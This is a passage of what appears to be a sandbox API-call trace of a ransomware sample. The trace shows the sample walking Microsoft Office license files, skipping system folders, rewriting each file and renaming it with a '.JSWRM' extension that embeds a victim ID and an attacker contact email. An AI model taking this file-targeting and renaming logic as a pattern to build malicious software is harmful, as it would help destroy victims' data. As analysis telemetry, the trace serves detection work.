HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.214] CloseHandle (hObject=0x45c) returned 1 [0108.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24be70 [0108.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d0a0, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a408 [0108.214] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a408, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a408 | out: hHeap=0x1e0000) returned 1 [0108.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xd0) returned 0x22ea18 [0108.214] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x136) returned 0x23aa80 [0108.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ea18 | out: hHeap=0x1e0000) returned 1 [0108.214] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.214] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_Subscription-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subscription-ul-oob.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_Subscription-ul-oob.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subscription-ul-oob.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23aa80 | out: hHeap=0x1e0000) returned 1 [0108.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24be70 | out: hHeap=0x1e0000) returned 1 [0108.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c0c8 | out: hHeap=0x1e0000) returned 1 [0108.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0108.215] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.215] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe99ddc4b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe99ddc4b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9a9c805, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2bb3, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdCO365R_SubTest-pl.xrm-ms", cAlternateFileName="PRD6DF~1.XRM")) returned 1 [0108.216] lstrcmpiW (lpString1="ProjectStdCO365R_SubTest-pl.xrm-ms", lpString2=".") returned 1 [0108.216] lstrcmpiW (lpString1="ProjectStdCO365R_SubTest-pl.xrm-ms", lpString2="..") returned 1 [0108.216] lstrcmpiW (lpString1="ProjectStdCO365R_SubTest-pl.xrm-ms", lpString2="...") returned 1 [0108.216] lstrcmpiW (lpString1="ProjectStdCO365R_SubTest-pl.xrm-ms", lpString2="windows") returned -1 [0108.216] lstrcmpiW (lpString1="ProjectStdCO365R_SubTest-pl.xrm-ms", lpString2="recovery") returned -1 [0108.216] lstrcmpiW (lpString1="ProjectStdCO365R_SubTest-pl.xrm-ms", lpString2="perflogs") returned 1 [0108.216] lstrcmpiW (lpString1="ProjectStdCO365R_SubTest-pl.xrm-ms", lpString2="documents and settings") returned 1 [0108.216] lstrcmpiW (lpString1="ProjectStdCO365R_SubTest-pl.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.216] lstrcmpiW (lpString1="ProjectStdCO365R_SubTest-pl.xrm-ms", lpString2="system volume information") returned -1 [0108.216] lstrcmpiW (lpString1="ProjectStdCO365R_SubTest-pl.xrm-ms", lpString2="msocache") returned 1 [0108.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0108.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_SubTest-pl.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0108.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_SubTest-pl.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22d0a0, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdCO365R_SubTest-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0108.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0108.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0108.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_SubTest-pl.xrm-ms", cchWideChar=34, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 34 [0108.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_SubTest-pl.xrm-ms", cchWideChar=34, lpMultiByteStr=0x22cdc8, cbMultiByte=34, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdCO365R_SubTest-pl.xrm-ms", lpUsedDefaultChar=0x0) returned 34 [0108.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0108.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0108.216] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b380 | out: hHeap=0x1e0000) returned 1 [0108.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.216] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.216] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236520 [0108.216] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_SubTest-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subtest-pl.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.217] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=11187) returned 1 [0108.217] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.217] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x2bb0) returned 0x24c1d0 [0108.217] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x2bb0, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x2bb0, lpOverlapped=0x0) returned 1 [0108.219] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.219] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x2bb0, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x2bb0, lpOverlapped=0x0) returned 1 [0108.219] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.219] CloseHandle (hObject=0x45c) returned 1 [0108.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x235f60 [0108.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.219] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d260, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.219] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0108.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a210 [0108.220] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a210, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a210 | out: hHeap=0x1e0000) returned 1 [0108.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0108.220] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f848 [0108.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24bf38 | out: hHeap=0x1e0000) returned 1 [0108.220] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0d8 | out: hHeap=0x1e0000) returned 1 [0108.220] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_SubTest-pl.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subtest-pl.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_SubTest-pl.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subtest-pl.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f848 | out: hHeap=0x1e0000) returned 1 [0108.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x235f60 | out: hHeap=0x1e0000) returned 1 [0108.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236520 | out: hHeap=0x1e0000) returned 1 [0108.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.221] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d0a0 | out: hHeap=0x1e0000) returned 1 [0108.221] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe99ddc4b, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe99ddc4b, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9b5b3c9, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x5172, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdCO365R_SubTest-ppd.xrm-ms", cAlternateFileName="PR50AE~1.XRM")) returned 1 [0108.221] lstrcmpiW (lpString1="ProjectStdCO365R_SubTest-ppd.xrm-ms", lpString2=".") returned 1 [0108.221] lstrcmpiW (lpString1="ProjectStdCO365R_SubTest-ppd.xrm-ms", lpString2="..") returned 1 [0108.221] lstrcmpiW (lpString1="ProjectStdCO365R_SubTest-ppd.xrm-ms", lpString2="...") returned 1 [0108.221] lstrcmpiW (lpString1="ProjectStdCO365R_SubTest-ppd.xrm-ms", lpString2="windows") returned -1 [0108.221] lstrcmpiW (lpString1="ProjectStdCO365R_SubTest-ppd.xrm-ms", lpString2="recovery") returned -1 [0108.221] lstrcmpiW (lpString1="ProjectStdCO365R_SubTest-ppd.xrm-ms", lpString2="perflogs") returned 1 [0108.221] lstrcmpiW (lpString1="ProjectStdCO365R_SubTest-ppd.xrm-ms", lpString2="documents and settings") returned 1 [0108.221] lstrcmpiW (lpString1="ProjectStdCO365R_SubTest-ppd.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.221] lstrcmpiW (lpString1="ProjectStdCO365R_SubTest-ppd.xrm-ms", lpString2="system volume information") returned -1 [0108.221] lstrcmpiW (lpString1="ProjectStdCO365R_SubTest-ppd.xrm-ms", lpString2="msocache") returned 1 [0108.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c328 [0108.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_SubTest-ppd.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0108.221] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22ce70 [0108.221] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_SubTest-ppd.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22ce70, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdCO365R_SubTest-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0108.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c328 | out: hHeap=0x1e0000) returned 1 [0108.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22be00 [0108.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_SubTest-ppd.xrm-ms", cchWideChar=35, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 35 [0108.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d260 [0108.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_SubTest-ppd.xrm-ms", cchWideChar=35, lpMultiByteStr=0x22d260, cbMultiByte=35, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdCO365R_SubTest-ppd.xrm-ms", lpUsedDefaultChar=0x0) returned 35 [0108.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22be00 | out: hHeap=0x1e0000) returned 1 [0108.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x236970 [0108.222] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0108.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.222] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2362f8 [0108.222] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_SubTest-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subtest-ppd.xrm-ms"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x45c [0108.222] GetFileSizeEx (in: hFile=0x45c, lpFileSize=0x345ebf8 | out: lpFileSize=0x345ebf8*=20850) returned 1 [0108.222] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.222] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x5170) returned 0x24c1d0 [0108.222] ReadFile (in: hFile=0x45c, lpBuffer=0x24c1d0, nNumberOfBytesToRead=0x5170, lpNumberOfBytesRead=0x345ec04, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesRead=0x345ec04*=0x5170, lpOverlapped=0x0) returned 1 [0108.227] SetFilePointer (in: hFile=0x45c, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0108.227] WriteFile (in: hFile=0x45c, lpBuffer=0x24c1d0*, nNumberOfBytesToWrite=0x5170, lpNumberOfBytesWritten=0x345ec00, lpOverlapped=0x0 | out: lpBuffer=0x24c1d0*, lpNumberOfBytesWritten=0x345ec00*=0x5170, lpOverlapped=0x0) returned 1 [0108.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24c1d0 | out: hHeap=0x1e0000) returned 1 [0108.228] CloseHandle (hObject=0x45c) returned 1 [0108.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xb0) returned 0x2365d8 [0108.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 24 [0108.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d298 [0108.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x1f8248, cbMultiByte=24, lpWideCharStr=0x22d298, cchWideChar=24 | out: lpWideCharStr="symmetries@tutamail.com") returned 24 [0108.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22cdc8 [0108.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d298 | out: hHeap=0x1e0000) returned 1 [0108.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 8 [0108.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x10) returned 0x23a1f8 [0108.228] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x13219c8, cbMultiByte=8, lpWideCharStr=0x23a1f8, cchWideChar=8 | out: lpWideCharStr="9A8I36E") returned 8 [0108.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23a1f8 | out: hHeap=0x1e0000) returned 1 [0108.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b2b8 [0108.228] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x11e) returned 0x23f720 [0108.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x24b2b8 | out: hHeap=0x1e0000) returned 1 [0108.228] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22cdc8 | out: hHeap=0x1e0000) returned 1 [0108.228] MoveFileW (lpExistingFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_SubTest-ppd.xrm-ms" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subtest-ppd.xrm-ms"), lpNewFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_SubTest-ppd.xrm-ms.[ID-9A8I36E][symmetries@tutamail.com].JSWRM" (normalized: "c:\\program files\\microsoft office\\root\\licenses16\\projectstdco365r_subtest-ppd.xrm-ms.[id-9a8i36e][symmetries@tutamail.com].jswrm")) returned 1 [0108.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x23f720 | out: hHeap=0x1e0000) returned 1 [0108.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2365d8 | out: hHeap=0x1e0000) returned 1 [0108.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x2362f8 | out: hHeap=0x1e0000) returned 1 [0108.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22d260 | out: hHeap=0x1e0000) returned 1 [0108.229] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22ce70 | out: hHeap=0x1e0000) returned 1 [0108.229] FindNextFileW (in: hFindFile=0x231d40, lpFindFileData=0x345ec90 | out: lpFindFileData=0x345ec90*(dwFileAttributes=0x220, ftCreationTime.dwLowDateTime=0xe991f0d5, ftCreationTime.dwHighDateTime=0x1d327e7, ftLastAccessTime.dwLowDateTime=0xe991f0d5, ftLastAccessTime.dwHighDateTime=0x1d327e7, ftLastWriteTime.dwLowDateTime=0xe9a2a0e6, ftLastWriteTime.dwHighDateTime=0x1d327e7, nFileSizeHigh=0x0, nFileSizeLow=0x2d71, dwReserved0=0xa000000c, dwReserved1=0x23307e, cFileName="ProjectStdCO365R_SubTest-ul-oob.xrm-ms", cAlternateFileName="PR3967~1.XRM")) returned 1 [0108.229] lstrcmpiW (lpString1="ProjectStdCO365R_SubTest-ul-oob.xrm-ms", lpString2=".") returned 1 [0108.229] lstrcmpiW (lpString1="ProjectStdCO365R_SubTest-ul-oob.xrm-ms", lpString2="..") returned 1 [0108.229] lstrcmpiW (lpString1="ProjectStdCO365R_SubTest-ul-oob.xrm-ms", lpString2="...") returned 1 [0108.229] lstrcmpiW (lpString1="ProjectStdCO365R_SubTest-ul-oob.xrm-ms", lpString2="windows") returned -1 [0108.229] lstrcmpiW (lpString1="ProjectStdCO365R_SubTest-ul-oob.xrm-ms", lpString2="recovery") returned -1 [0108.229] lstrcmpiW (lpString1="ProjectStdCO365R_SubTest-ul-oob.xrm-ms", lpString2="perflogs") returned 1 [0108.230] lstrcmpiW (lpString1="ProjectStdCO365R_SubTest-ul-oob.xrm-ms", lpString2="documents and settings") returned 1 [0108.230] lstrcmpiW (lpString1="ProjectStdCO365R_SubTest-ul-oob.xrm-ms", lpString2="$RECYCLE.BIN") returned 1 [0108.230] lstrcmpiW (lpString1="ProjectStdCO365R_SubTest-ul-oob.xrm-ms", lpString2="system volume information") returned -1 [0108.230] lstrcmpiW (lpString1="ProjectStdCO365R_SubTest-ul-oob.xrm-ms", lpString2="msocache") returned 1 [0108.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c5e8 [0108.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_SubTest-ul-oob.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0108.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0a0 [0108.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_SubTest-ul-oob.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22d0a0, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdCO365R_SubTest-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0108.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c5e8 | out: hHeap=0x1e0000) returned 1 [0108.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x50) returned 0x22c118 [0108.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_SubTest-ul-oob.xrm-ms", cchWideChar=38, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 38 [0108.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0x30) returned 0x22d0d8 [0108.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="ProjectStdCO365R_SubTest-ul-oob.xrm-ms", cchWideChar=38, lpMultiByteStr=0x22d0d8, cbMultiByte=38, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="ProjectStdCO365R_SubTest-ul-oob.xrm-ms", lpUsedDefaultChar=0x0) returned 38 [0108.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x22c118 | out: hHeap=0x1e0000) returned 1 [0108.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24b1f0 [0108.230] HeapFree (in: hHeap=0x1e0000, dwFlags=0x0, lpMem=0x236970 | out: hHeap=0x1e0000) returned 1 [0108.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 5 [0108.230] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="JSWRM", cchWideChar=5, lpMultiByteStr=0x345ec64, cbMultiByte=5, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="JSWRM", lpUsedDefaultChar=0x0) returned 5 [0108.230] RtlAllocateHeap (HeapHandle=0x1e0000, Flags=0x0, Size=0xc0) returned 0x24bf38 [0108.230] CreateFileW (lpFileName="C:\\Program Files\\Microsoft Office\\root\\Licenses16\\ProjectStdCO365R_SubTest-ul-oob.xrm-ms" (normalized: "c:\\program files\\microsoft 